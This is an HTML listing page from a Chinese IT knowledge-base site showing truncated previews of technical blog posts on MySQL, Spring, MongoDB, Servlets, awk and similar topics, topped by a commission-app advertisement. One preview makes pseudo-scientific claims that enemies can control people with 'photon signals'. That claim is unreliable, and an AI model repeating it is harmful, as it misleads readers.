                        <div>社交电商是目前电商发展的一个非常热门的领域，它将传统的电商和社交媒体相结合，让用户可以在社交平台上完成购物、支付等操作。社交电商不同于传统电商，它更加注重用户的社交性和互动性，通过社交媒体的传播，吸引用户关注，让产品能够更加快速地传播。京东密令红包：最爱领红包828红包多多148今天给大家分享我长期在做的副业，也在这里赚到人生第3桶金！氧惠APP佣金高，资质靠谱，各大应用市场均可搜索使用。【氧惠】</div>
                    </li>
                                <li><a href="/article/101.htm"
                                       title="数据采集高并发的架构应用" target="_blank">数据采集高并发的架构应用</a>
                                    <span class="text-muted">3golden</span>
<a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a>
                                    <div>问题的出发点： 
 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 最近公司为了发展需要，要扩大对用户的信息采集，每个用户的采集量估计约2W。如果用户量增加的话，将会大量照成采集量成3W倍的增长，但是又要满足日常业务需要，特别是指令要及时得到响应的频率次数远大于预期。 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n</div>
                                </li>
                                <li><a href="/article/228.htm"
                                       title="不停止 MySQL 服务增加从库的两种方式" target="_blank">不停止 MySQL 服务增加从库的两种方式</a>
                                    <span class="text-muted">brotherlamp</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/linux%E8%A7%86%E9%A2%91/1.htm">linux视频</a><a class="tag" taget="_blank" href="/search/linux%E8%B5%84%E6%96%99/1.htm">linux资料</a><a class="tag" taget="_blank" href="/search/linux%E6%95%99%E7%A8%8B/1.htm">linux教程</a><a class="tag" taget="_blank" href="/search/linux%E8%87%AA%E5%AD%A6/1.htm">linux自学</a>
                                    <div>现在生产环境MySQL数据库是一主一从，由于业务量访问不断增大，故再增加一台从库。前提是不能影响线上业务使用，也就是说不能重启MySQL服务，为了避免出现其他情况，选择在网站访问量低峰期时间段操作。 
&nbsp;一般在线增加从库有两种方式，一种是通过mysqldump备份主库，恢复到从库，mysqldump是逻辑备份，数据量大时，备份速度会很慢，锁表的时间也会很长。另一种是通过xtrabacku</div>
                                </li>
                                <li><a href="/article/355.htm"
                                       title="Quartz——SimpleTrigger触发器" target="_blank">Quartz——SimpleTrigger触发器</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/SimpleTrigger/1.htm">SimpleTrigger</a><a class="tag" taget="_blank" href="/search/TriggerUtils/1.htm">TriggerUtils</a><a class="tag" taget="_blank" href="/search/quartz/1.htm">quartz</a>
                                    <div>转载请出自出处：http://eksliang.iteye.com/blog/2208166 一.概述 
SimpleTrigger触发器，当且仅需触发一次或者以固定时间间隔周期触发执行； 
&nbsp; 二.SimpleTrigger的构造函数 
 
 SimpleTrigger(String name, String group)：通过该构造函数指定Trigger所属组和名称； 
 Simpl</div>
                                </li>
                                <li><a href="/article/482.htm"
                                       title="Informatica应用（1）" target="_blank">Informatica应用（1）</a>
                                    <span class="text-muted">18289753290</span>
<a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/workflow/1.htm">workflow</a><a class="tag" taget="_blank" href="/search/lookup/1.htm">lookup</a><a class="tag" taget="_blank" href="/search/%E7%BB%84%E4%BB%B6/1.htm">组件</a><a class="tag" taget="_blank" href="/search/Informatica/1.htm">Informatica</a>
                                    <div>1.如果要在workflow中调用shell脚本有一个command组件，在里面设置shell的路径；调度wf可以右键出现schedule，现在用的是HP的tidal调度wf的执行。 
2.designer里面的router类似于SSIS中的broadcast（多播组件）;Reset_Workflow_Var：参数重置 （比如说我这个参数初始是1在workflow跑得过程中变成了3我要在结束时还要</div>
                                </li>
                                <li><a href="/article/609.htm"
                                       title="python 获取图片验证码中文字" target="_blank">python 获取图片验证码中文字</a>
                                    <span class="text-muted">酷的飞上天空</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                                    <div>根据现成的开源项目&nbsp;http://code.google.com/p/pytesser/改写 
在window上用easy_install安装不上 &nbsp;看了下源码发现代码很少 &nbsp;于是就想自己改写一下 
&nbsp; 
添加支持网络图片的直接解析 
&nbsp; 
  
#coding:utf-8 
#import sys 
#reload(sys) 
#sys.s</div>
                                </li>
                                <li><a href="/article/736.htm"
                                       title="AJAX" target="_blank">AJAX</a>
                                    <span class="text-muted">永夜-极光</span>
<a class="tag" taget="_blank" href="/search/Ajax/1.htm">Ajax</a>
                                    <div>1.AJAX功能:动态更新页面,减少流量消耗,减轻服务器负担 
&nbsp; 
2.代码结构: 
&nbsp;&nbsp; 
&lt;html&gt;

&lt;head&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
function loadXMLDoc()
{
.... AJAX script goes here ...
</div>
                                </li>
                                <li><a href="/article/863.htm"
                                       title="创业OR读研" target="_blank">创业OR读研</a>
                                    <span class="text-muted">随便小屋</span>
<a class="tag" taget="_blank" href="/search/%E5%88%9B%E4%B8%9A/1.htm">创业</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 现在研一，有种想创业的想法，不知道该不该去实施。因为对于的我情况这两者是矛盾的，可能就是鱼与熊掌不能兼得。 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 研一的生活刚刚过去两个月，我们学校主要的是</div>
                                </li>
                                <li><a href="/article/990.htm"
                                       title="需求做得好与坏直接关系着程序员生活质量" target="_blank">需求做得好与坏直接关系着程序员生活质量</a>
                                    <span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/IT+%E7%94%9F%E6%B4%BB/1.htm">IT 生活</a>
                                    <div>  
&nbsp; &nbsp; &nbsp; &nbsp; 这个故事还得从去年换工作的事情说起，由于自己不太喜欢第一家公司的环境我选择了换一份工作。去年九月份我入职现在的这家公司，专门从事金融业内软件的开发。十一月份我们整个项目组前往北京做现场开发，从此苦逼的日子开始了。 
&nbsp; &nbsp; &nbsp; &nbsp;系统背景：五月份就有同事前往甲方了解需求一直到6月份，后续几个月也完</div>
                                </li>
                                <li><a href="/article/1117.htm"
                                       title="如何定义和区分高级软件开发工程师" target="_blank">如何定义和区分高级软件开发工程师</a>
                                    <span class="text-muted">aoyouzi</span>

                                    <div>在软件开发领域，高级开发工程师通常是指那些编写代码超过 3 年的人。这些人可能会被放到领导的位置，但经常会产生非常糟糕的结果。Matt Briggs&nbsp;是一名高级开发工程师兼&nbsp;Scrum 管理员。他认为，单纯使用年限来划分开发人员存在问题，两个同样具有 10 年开发经验的开发人员可能大不相同。近日，他发表了一篇博文，根据开发者所能发挥的作用划分软件开发工程师的成长阶段。 
　　初</div>
                                </li>
                                <li><a href="/article/1244.htm"
                                       title="Servlet的请求与响应" target="_blank">Servlet的请求与响应</a>
                                    <span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/servlet/1.htm">servlet</a><a class="tag" taget="_blank" href="/search/get%E6%8F%90%E4%BA%A4/1.htm">get提交</a><a class="tag" taget="_blank" href="/search/java%E5%A4%84%E7%90%86post%E6%8F%90%E4%BA%A4/1.htm">java处理post提交</a>
                                    <div>&nbsp; 
Servlet是tomcat中的一个重要组成,也是负责客户端和服务端的中介 
&nbsp; 
&nbsp; 
1,Http的请求方式(get &nbsp;,post); 
&nbsp; 客户端的请求一般都会都是Servlet来接受的,在接收之前怎么来确定是那种方式提交的,以及如何反馈,Servlet中有相应的方法, &nbsp;http的get方式 servlet就是都doGet(</div>
                                </li>
                                <li><a href="/article/1371.htm"
                                       title="web.xml配置详解之listener" target="_blank">web.xml配置详解之listener</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/web.xml/1.htm">web.xml</a><a class="tag" taget="_blank" href="/search/listener/1.htm">listener</a>
                                    <div>一.定义 
&lt;listener&gt;  
	&lt;listen-class&gt;com.myapp.MyListener&lt;/listen-class&gt;  
&lt;/listener&gt; 
&nbsp; 
二.作用&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 该元素用来注册一个监听器类。可以收到事件什么时候发生以及用什么作为响</div>
                                </li>
                                <li><a href="/article/1498.htm"
                                       title="Web页面性能优化（yahoo技术）" target="_blank">Web页面性能优化（yahoo技术）</a>
                                    <span class="text-muted">Bill_chen</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/Ajax/1.htm">Ajax</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/Yahoo/1.htm">Yahoo</a>
                                    <div>1.尽可能的减少HTTP请求数 content 
2.使用CDN server 
3.添加Expires头(或者 Cache-control) server 
4.Gzip 组件 server 
5.把CSS样式放在页面的上方。 css 
6.将脚本放在底部(包括内联的) javascript 
7.避免在CSS中使用Expressions css 
8.将javascript和css独立成外部文</div>
                                </li>
                                <li><a href="/article/1625.htm"
                                       title="【MongoDB学习笔记八】MongoDB游标、分页查询、查询结果排序" target="_blank">【MongoDB学习笔记八】MongoDB游标、分页查询、查询结果排序</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a>
                                    <div>游标 
&nbsp; 
游标，简单的说就是一个查询结果的指针。游标作为数据库的一个对象，使用它是包括 
 
 声明 
 打开 
 循环抓去一定数目的文档直到结果集中的所有文档已经抓取完 
 关闭游标 
 
&nbsp; 
游标的基本用法，类似于JDBC的ResultSet(hasNext判断是否抓去完,next移动游标到下一条文档)，在获取一个文档集时，可以提供一个类似JDBC的FetchSize</div>
                                </li>
                                <li><a href="/article/1752.htm"
                                       title="ORA-12514 TNS 监听程序当前无法识别连接描述符中请求服务 的解决方法" target="_blank">ORA-12514 TNS 监听程序当前无法识别连接描述符中请求服务 的解决方法</a>
                                    <span class="text-muted">白糖_</span>
<a class="tag" taget="_blank" href="/search/ORA-12514/1.htm">ORA-12514</a>
                                    <div> 今天通过Oracle SQL*Plus连接远端服务器的时候提示“监听程序当前无法识别连接描述符中请求服务”，遂在网上找到了解决方案： 
 ①打开Oracle服务器安装目录\NETWORK\ADMIN\listener.ora文件，你会看到如下信息： 
&nbsp; 
# listener.ora Network Configuration File: D:\database\Oracle\net</div>
                                </li>
                                <li><a href="/article/1879.htm"
                                       title="Eclipse 问题 A resource exists with a different case" target="_blank">Eclipse 问题 A resource exists with a different case</a>
                                    <span class="text-muted">bozch</span>
<a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a>
                                    <div>在使用Eclipse进行开发的时候，出现了如下的问题： 
Description&nbsp;Resource&nbsp;Path&nbsp;Location&nbsp;TypeThe project was not built due to &quot;A resource exists with a different case: '/SeenTaoImp_zhV2/bin/seentao'.&</div>
                                </li>
                                <li><a href="/article/2006.htm"
                                       title="编程之美-小飞的电梯调度算法" target="_blank">编程之美-小飞的电梯调度算法</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/1.htm">编程之美</a>
                                    <div>

public class AptElevator {

	/**
	 * 编程之美 小飞 电梯调度算法
	 * 在繁忙的时间，每次电梯从一层往上走时，我们只允许电梯停在其中的某一层。
	 * 所有乘客都从一楼上电梯，到达某层楼后，电梯听下来，所有乘客再从这里爬楼梯到自己的目的层。
	 * 在一楼时，每个乘客选择自己的目的层，电梯则自动计算出应停的楼层。
	 * 问：电梯停在哪</div>
                                </li>
                                <li><a href="/article/2133.htm"
                                       title="SQL注入相关概念" target="_blank">SQL注入相关概念</a>
                                    <span class="text-muted">chenbowen00</span>
<a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                                    <div>SQL Injection：就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。 
 
具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。 
 
首先让我们了解什么时候可能发生SQ</div>
                                </li>
                                <li><a href="/article/2260.htm"
                                       title="[光与电]光子信号战防御原理" target="_blank">[光与电]光子信号战防御原理</a>
                                    <span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E5%8E%9F%E7%90%86/1.htm">原理</a>
                                    <div> 
 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 无论是在战场上,还是在后方,敌人都有可能用光子信号对人体进行控制和攻击,那么采取什么样的防御方法,最简单,最有效呢? 
 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 我们这里有几个山寨的办法,可能有些作用,大家如果有兴趣可以去实验一下 
 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 根据光</div>
                                </li>
                                <li><a href="/article/2387.htm"
                                       title="oracle 11g新特性:Pending Statistics" target="_blank">oracle 11g新特性:Pending Statistics</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/dbms_stats/1.htm">dbms_stats</a>
                                    <div>oracle 11g新特性:Pending Statistics 转 
 
从11g开始，表与索引的统计信息收集完毕后，可以选择收集的统信息立即发布，也可以选择使新收集的统计信息处于pending状态，待确定处于pending状态的统计信息是安全的，再使处于pending状态的统计信息发布，这样就会避免一些因为收集统计信息立即发布而导致SQL执行计划走错的灾难。 
 
在 11g 之前的版本中，D</div>
                                </li>
                                <li><a href="/article/2514.htm"
                                       title="快速理解RequireJs" target="_blank">快速理解RequireJs</a>
                                    <span class="text-muted">dengkane</span>
<a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/requirejs/1.htm">requirejs</a>
                                    <div>RequireJs已经流行很久了，我们在项目中也打算使用它。它提供了以下功能： 
 
 声明不同js文件之间的依赖 
 可以按需、并行、延时载入js库 
 可以让我们的代码以模块化的方式组织 
 
初看起来并不复杂。 在html中引入requirejs 
在HTML中，添加这样的&nbsp;&lt;script&gt;&nbsp;标签： 
&lt;script src=&quot;/path/to</div>
                                </li>
                                <li><a href="/article/2641.htm"
                                       title="C语言学习四流程控制if条件选择、for循环和强制类型转换" target="_blank">C语言学习四流程控制if条件选择、for循环和强制类型转换</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/c/1.htm">c</a>
                                    <div># include &lt;stdio.h&gt;

int main(void)
{
	int i, j;

	scanf(&quot;%d %d&quot;, &amp;i, &amp;j);

	if (i &gt; j)
		printf(&quot;i大于j\n&quot;);
	else
		printf(&quot;i小于j\n&quot;);

	retu</div>
                                </li>
                                <li><a href="/article/2768.htm"
                                       title="dictionary的使用要注意" target="_blank">dictionary的使用要注意</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/IO/1.htm">IO</a>
                                    <div>NSDictionary *dict = [NSDictionary dictionaryWithObjectsAndKeys:
                          user.user_id , @&quot;id&quot;,
                          user.username , @&quot;username&quot;,
         </div>
                                </li>
                                <li><a href="/article/2895.htm"
                                       title="Android 中的资源访问(Resource)" target="_blank">Android 中的资源访问(Resource)</a>
                                    <span class="text-muted">finally_m</span>
<a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a><a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/String/1.htm">String</a><a class="tag" taget="_blank" href="/search/drawable/1.htm">drawable</a><a class="tag" taget="_blank" href="/search/color/1.htm">color</a>
                                    <div> 
简单的说，Android中的资源是指非代码部分。例如，在我们的Android程序中要使用一些图片来设置界面，要使用一些音频文件来设置铃声，要使用一些动画来显示特效，要使用一些字符串来显示提示信息。那么，这些图片、音频、动画和字符串等叫做Android中的资源文件。 
在Eclipse创建的工程中，我们可以看到res和assets两个文件夹，是用来保存资源文件的，在assets中保存的一般是原生</div>
                                </li>
                                <li><a href="/article/3022.htm"
                                       title="Spring使用Cache、整合Ehcache" target="_blank">Spring使用Cache、整合Ehcache</a>
                                    <span class="text-muted">234390216</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/cache/1.htm">cache</a><a class="tag" taget="_blank" href="/search/ehcache/1.htm">ehcache</a><a class="tag" taget="_blank" href="/search/%40Cacheable/1.htm">@Cacheable</a>
                                    <div>Spring使用Cache 
&nbsp; 
&nbsp; 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 从3.1开始，Spring引入了对Cache的支持。其使用方法和原理都类似于Spring对事务管理的支持。Spring Cache是作用在方法上的，其核心思想是这样的：当我们在调用一个缓存方法时会把该方法参数和返回结果作为一个键值对存放在缓存中，等到下次利用同样的</div>
                                </li>
                                <li><a href="/article/3149.htm"
                                       title="当druid遇上oracle blob(clob)" target="_blank">当druid遇上oracle blob(clob)</a>
                                    <span class="text-muted">jackyrong</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a>
                                    <div>http://blog.csdn.net/renfufei/article/details/44887371 
 
众所周知，Oracle有很多坑, 所以才有了去IOE。 
 
在使用Druid做数据库连接池后，其实偶尔也会碰到小坑，这就是使用开源项目所必须去填平的。【如果使用不开源的产品，那就不是坑，而是陷阱了，你都不知道怎么去填坑】 
 
用Druid连接池，通过JDBC往Oracle数据库的</div>
                                </li>
                                <li><a href="/article/3276.htm"
                                       title="easyui datagrid pagination获得分页页码、总页数等信息" target="_blank">easyui datagrid pagination获得分页页码、总页数等信息</a>
                                    <span class="text-muted">ldzyz007</span>

                                    <div>var grid = $('#datagrid');&nbsp; 
var options = grid.datagrid('getPager').data(&quot;pagination&quot;).options;&nbsp; 
var curr = options.pageNumber;&nbsp; 
var total = options.total;&nbsp; 
var max =</div>
                                </li>
                                <li><a href="/article/3403.htm"
                                       title="浅析awk里的数组" target="_blank">浅析awk里的数组</a>
                                    <span class="text-muted">nigelzeng</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84/1.htm">二维数组</a><a class="tag" taget="_blank" href="/search/array/1.htm">array</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E7%BB%84/1.htm">数组</a><a class="tag" taget="_blank" href="/search/awk/1.htm">awk</a>
                                    <div>awk绝对是文本处理中的神器，它本身也是一门编程语言，还有许多功能本人没有使用到。这篇文章就单单针对awk里的数组来进行讨论，如何利用数组来帮助完成文本分析。 
&nbsp; 
有这么一组数据： 
&nbsp;  abcd,91#31#2012-12-31 11:24:00 
case_a,136#19#2012-12-31 11:24:00 
case_a,136#23#2012-12-31 1</div>
                                </li>
                                <li><a href="/article/3530.htm"
                                       title="搭建 CentOS 6 服务器(6) - TigerVNC" target="_blank">搭建 CentOS 6 服务器(6) - TigerVNC</a>
                                    <span class="text-muted">rensanning</span>
<a class="tag" taget="_blank" href="/search/centos/1.htm">centos</a>
                                    <div>安装GNOME桌面环境 
 
# yum groupinstall &quot;X Window System&quot; &quot;Desktop&quot; 
 
 
安装TigerVNC 
 
# yum -y install tigervnc-server tigervnc 
 
 
启动VNC服务 
 
# /etc/init.d/vncserver restart
# vncser</div>
                                </li>
                                <li><a href="/article/3657.htm"
                                       title="Spring 数据库连接整理" target="_blank">Spring 数据库连接整理</a>
                                    <span class="text-muted">tomcat_oracle</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/bean/1.htm">bean</a><a class="tag" taget="_blank" href="/search/jdbc/1.htm">jdbc</a>
                                    <div>1、数据库连接jdbc.properties配置详解  　　jdbc.url=jdbc:hsqldb:hsql://localhost/xdb   　　jdbc.username=sa   　　jdbc.password=   　　jdbc.driver=不同的数据库厂商驱动，此处不一一列举   　　接下来，详细配置代码如下：   　　 
Spring连接池   &nbsp;&nbsp;&nbsp</div>
                                </li>
                                <li><a href="/article/3784.htm"
                                       title="Dom4J解析使用xpath java.lang.NoClassDefFoundError: org/jaxen/JaxenException异常" target="_blank">Dom4J解析使用xpath java.lang.NoClassDefFoundError: org/jaxen/JaxenException异常</a>
                                    <span class="text-muted">xp9802</span>

                                    <div>用Dom4J解析xml,以前没注意,今天使用dom4j包解析xml时在xpath使用处报错 
&nbsp;&nbsp;&nbsp;&nbsp; 异常栈：java.lang.NoClassDefFoundError: org/jaxen/JaxenException异常&nbsp; 
&nbsp;&nbsp;&nbsp;&nbsp; 导入包 jaxen-1.1-beta-6.jar 解决; 
&nb</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>